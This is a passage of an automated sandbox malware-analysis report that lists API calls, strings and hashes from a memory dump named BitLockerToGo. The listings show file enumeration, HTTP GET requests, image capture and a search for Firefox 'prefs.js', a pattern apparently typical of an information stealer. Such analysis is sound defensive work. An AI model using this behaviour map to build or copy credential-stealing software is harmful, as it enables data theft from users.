                                                                                                                                                      • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                      • API String ID: 301339242-3790311718
                                                                                                                                                      • Opcode ID: 9c69248761cf03cd21d8b3cdd423637ec9c7653cf38654fcac85733468db0f37
                                                                                                                                                      • Instruction ID: 93799502dac207e4181d460b23aebe17e0339bc22b5827bb3ccf07f66bb52ddc
                                                                                                                                                      • Opcode Fuzzy Hash: 9c69248761cf03cd21d8b3cdd423637ec9c7653cf38654fcac85733468db0f37
                                                                                                                                                      • Instruction Fuzzy Hash: A4B19271B082209FDB29DF29C58865E7BF5BB99708F04893DE4A9D7750E7349801CBE2

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfA.USER32 ref: 0276492C
                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 02764943
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,02770FDC), ref: 02764971
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,02770FE0), ref: 02764987
                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 02764B7D
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 02764B92
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                      • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                      • API String ID: 180737720-445461498
                                                                                                                                                      • Opcode ID: 8e1f0e4a0314b8cff90e6dfa3c258665092ab1f3b4e5cf8100a8d25db518b506
                                                                                                                                                      • Instruction ID: 657df334bd174775f9ad171b9f4c05631d89a9f84563bd6ffb58fdb5d475ad92
                                                                                                                                                      • Opcode Fuzzy Hash: 8e1f0e4a0314b8cff90e6dfa3c258665092ab1f3b4e5cf8100a8d25db518b506
                                                                                                                                                      • Instruction Fuzzy Hash: 596166B1940218ABDF20EFA4DC59FFA777CFB49701F004588A60E96140EB71AB95CF91

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0276906C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateGlobalStream
                                                                                                                                                      • String ID: image/jpeg
                                                                                                                                                      • API String ID: 2244384528-3785015651
                                                                                                                                                      • Opcode ID: e08048f22793b423eaec95b8797aa1cbfec4a270d9f4b7d609d2ef570cec5e82
                                                                                                                                                      • Instruction ID: 0a9fec1874d7228d170ed56801d7b9506e5d43ab08935ec1896e54a6da1ca3ba
                                                                                                                                                      • Opcode Fuzzy Hash: e08048f22793b423eaec95b8797aa1cbfec4a270d9f4b7d609d2ef570cec5e82
                                                                                                                                                      • Instruction Fuzzy Hash: D871EBB1D50208EBDB04DFE8D999FEEB7B9FB48710F108508F615A7280DB75A905CB60
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 027547EA
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754801
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754818
                                                                                                                                                        • Part of subcall function 027547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02754839
                                                                                                                                                        • Part of subcall function 027547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 02754849
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • InternetOpenA.WININET(02770DFE,00000001,00000000,00000000,00000000), ref: 027562E1
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,029E4B88), ref: 02756303
                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02756335
                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,GET,?,029E5F38,00000000,00000000,00400100,00000000), ref: 02756385
                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 027563BF
                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 027563D1
                                                                                                                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 027563FD
                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0275646D
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 027564EF
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 027564F9
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02756503
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                      • String ID: ERROR$ERROR$GET
                                                                                                                                                      • API String ID: 3074848878-2509457195
                                                                                                                                                      • Opcode ID: ce980877a5aaa7a756a9472485edad148c1c5c2f72724899e8e7491dfa0ac77f
                                                                                                                                                      • Instruction ID: df7634e88ce13e8abaa1cfa62f3a9c4f92be1bfaa3663476d0d5a4f0af95bc5b
                                                                                                                                                      • Opcode Fuzzy Hash: ce980877a5aaa7a756a9472485edad148c1c5c2f72724899e8e7491dfa0ac77f
                                                                                                                                                      • Instruction Fuzzy Hash: EA719171A40218EBEB14DF94CC59BEEB7B9FB44700F508198E90A7B184DBB56A85CF90
                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfA.USER32 ref: 02763EC3
                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 02763EDA
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,02770FAC), ref: 02763F08
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,02770FB0), ref: 02763F1E
                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0276406C
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 02764081
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                      • API String ID: 180737720-4073750446
                                                                                                                                                      • Opcode ID: 64582d4451d59166db6a3e65827589b3cb15f2f67f853215071fb70c199591ed
                                                                                                                                                      • Instruction ID: 5a9e26450f5811546cc67f49fb8d7cef283fb2ef98dbf6cc27e6c8fd49ff346f
                                                                                                                                                      • Opcode Fuzzy Hash: 64582d4451d59166db6a3e65827589b3cb15f2f67f853215071fb70c199591ed
                                                                                                                                                      • Instruction Fuzzy Hash: 445185B2904218ABCB25EBB4DC8DFFA737DFB44300F444588B61992040DB759B89CFA0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,027715B8,02770D96), ref: 0275F71E
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,027715BC), ref: 0275F76F
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,027715C0), ref: 0275F785
                                                                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 0275FAB1
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 0275FAC3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                      • String ID: prefs.js
                                                                                                                                                      • API String ID: 3334442632-3783873740
                                                                                                                                                      • Opcode ID: 03024f51dd63292a7d3100ed38aafa959d4972d2d5c75f128f429f46eb6b8ca0
                                                                                                                                                      • Instruction ID: 8c8489b662c52df2d52eafb8170ca7f93132661f61b2a945df3e5897be9fb404
                                                                                                                                                      • Opcode Fuzzy Hash: 03024f51dd63292a7d3100ed38aafa959d4972d2d5c75f128f429f46eb6b8ca0
                                                                                                                                                      • Instruction Fuzzy Hash: 2DB15D719002199BDB26EF60DC9DBFEB37AAF55300F4085A8DD0AA6540EF306B49CF91
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0277511C,?,02751F2C,?,027751C4,?,?,00000000,?,00000000), ref: 02751923
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0277526C), ref: 02751973
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,02775314), ref: 02751989
                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02751D40
                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 02751DCA
                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 02751E20
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 02751E32
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                      • String ID: \*.*
                                                                                                                                                      • API String ID: 1415058207-1173974218
                                                                                                                                                      • Opcode ID: a3c45ee922f81f332694cd96a7fa847a773cf737cbf1fd59fdfec21aa1fe8ba5
                                                                                                                                                      • Instruction ID: 1a475c1e192c1e88b8c47924c336a8c202b1f5824ed797be281d51647cbaf50a
                                                                                                                                                      • Opcode Fuzzy Hash: a3c45ee922f81f332694cd96a7fa847a773cf737cbf1fd59fdfec21aa1fe8ba5
                                                                                                                                                      • Instruction Fuzzy Hash: E812AE719102199BDB1BFB60DC9DAFE737AAF54300F5045A9990A76090EF706F89CFA0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,027714B0,02770C2A), ref: 0275DAEB
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,027714B4), ref: 0275DB33
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,027714B8), ref: 0275DB49
                                                                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 0275DDCC
                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 0275DDDE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
